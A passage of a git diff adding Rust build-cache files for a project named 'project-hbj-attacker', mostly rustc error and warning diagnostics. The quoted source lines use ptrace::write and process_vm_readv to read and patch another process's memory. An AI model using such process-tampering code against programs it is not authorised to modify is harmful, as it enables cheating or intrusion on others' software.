std::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::os::raw::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use core::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null},{"message":"if you import `c_long`, refer to it directly","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":4706,"byte_end":4712,"line_start":141,"line_end":141,"column_start":24,"column_end":30,"is_primary":true,"text":[{"text":" let new_word = libc::c_long::from_ne_bytes(bytes);","highlight_start":24,"highlight_end":30}],"label":null,"suggested_replacement":"","suggestion_applicability":"Unspecified","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:141:24\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m141\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let new_word = libc::c_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing one of these type aliases\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::os::raw::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use core::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: if you import `c_long`, refer to it directly\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m141\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\u001b[0m let new_word = \u001b[0m\u001b[0m\u001b[38;5;9mlibc::\u001b[0m\u001b[0mc_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m141\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ \u001b[0m\u001b[0m let new_word = c_long::from_ne_bytes(bytes);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4801,"byte_end":4805,"line_start":143,"line_end":143,"column_start":43,"column_end":47,"is_primary":true,"text":[{"text":" let ptr = &new_word as *const libc::c_long as *mut libc::c_void;","highlight_start":43,"highlight_end":47}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:143:43\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m143\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &new_word as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4822,"byte_end":4826,"line_start":143,"line_end":143,"column_start":64,"column_end":68,"is_primary":true,"text":[{"text":" let ptr = &new_word as *const libc::c_long as *mut libc::c_void;","highlight_start":64,"highlight_end":68}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:143:64\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m143\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &new_word as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4888,"byte_end":4892,"line_start":144,"line_end":144,"column_start":53,"column_end":57,"is_primary":true,"text":[{"text":" ptrace::write(pid, aligned_addr as *mut libc::c_void, ptr)?;","highlight_start":53,"highlight_end":57}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:144:53\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m144\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m ptrace::write(pid, aligned_addr as *mut libc::c_void, ptr)?;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1222,"byte_end":1223,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1222,"byte_end":1223,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:43:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m43\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"aborting due to 18 previous errors; 1 warning emitted","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to 18 previous errors; 1 warning emitted\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"For more information about this error, try `rustc --explain E0433`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about this error, try `rustc --explain E0433`.\u001b[0m\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..72160e8
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,15811409210602710039]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-35a108fdfad73814/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/bin-project-hbj-attacker
new file mode 100644
index 0000000..9c30b93
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/bin-project-hbj-attacker
@@ -0,0 +1 @@
+38a3b168a21afdf5
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..bf23746
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":8731458305071235362,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,10560131651692027714]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..fb95970
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..01d57a2
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-35cbea8aa5b55547/output-bin-project-hbj-attacker
@@ -0,0 +1,2 @@
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1047,"byte_end":1048,"line_start":37,"line_end":37,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1047,"byte_end":1048,"line_start":37,"line_end":37,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:37:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m37\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"1 warning emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 1 warning emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/bin-project-hbj-attacker
new file mode 100644
index 0000000..e69de29
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..800c4af
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,3813136525644006961]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-39794b693e707518/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..808219b
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..f550764
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-39794b693e707518/output-bin-project-hbj-attacker
@@ -0,0 +1,8 @@
+{"$message_type":"diagnostic","message":"unresolved import `nix::sys::uio`","code":{"code":"E0432","explanation":"An import was unresolved.\n\nErroneous code example:\n\n```compile_fail,E0432\nuse something::Foo; // error: unresolved import `something::Foo`.\n```\n\nIn Rust 2015, paths in `use` statements are relative to the crate root. To\nimport items relative to the current and parent modules, use the `self::` and\n`super::` prefixes, respectively.\n\nIn Rust 2018 or later, paths in `use` statements are relative to the current\nmodule unless they begin with the name of a crate or a literal `crate::`, in\nwhich case they start from the crate root. As in Rust 2015 code, the `self::`\nand `super::` prefixes refer to the current and parent modules respectively.\n\nAlso verify that you didn't misspell the import name and that the import exists\nin the module from where you tried to import it. Example:\n\n```\nuse self::something::Foo; // Ok.\n\nmod something {\n pub struct Foo;\n}\n# fn main() {}\n```\n\nIf you tried to use a module from an external crate and are using Rust 2015,\nyou may have missed the `extern crate` declaration (which is usually placed in\nthe crate root):\n\n```edition2015\nextern crate core; // Required to use the `core` crate in Rust 2015.\n\nuse core::any;\n# fn main() {}\n```\n\nSince Rust 2018 the `extern crate` declaration is not required and\nyou can instead just `use` it:\n\n```edition2018\nuse core::any; // No extern crate required in Rust 2018.\n# fn main() {}\n```\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":59,"byte_end":62,"line_start":4,"line_end":4,"column_start":15,"column_end":18,"is_primary":true,"text":[{"text":"use nix::sys::uio::{process_vm_readv, RemoteIoVec};","highlight_start":15,"highlight_end":18}],"label":"could not find `uio` in `sys`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"found an item that was configured out","code":null,"level":"note","spans":[{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":2675,"byte_end":2690,"line_start":170,"line_end":170,"column_start":8,"column_end":23,"is_primary":false,"text":[{"text":" #![feature = \"uio\"]","highlight_start":8,"highlight_end":23}],"label":"the item is gated behind the `uio` feature","suggested_replacement":null,"suggestion_applicability":null,"expansion":null},{"file_name":"/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs","byte_start":2704,"byte_end":2707,"line_start":171,"line_end":171,"column_start":13,"column_end":16,"is_primary":true,"text":[{"text":" pub mod uio;","highlight_start":13,"highlight_end":16}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0432]\u001b[0m\u001b[0m\u001b[1m: unresolved import `nix::sys::uio`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:4:15\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m4\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m 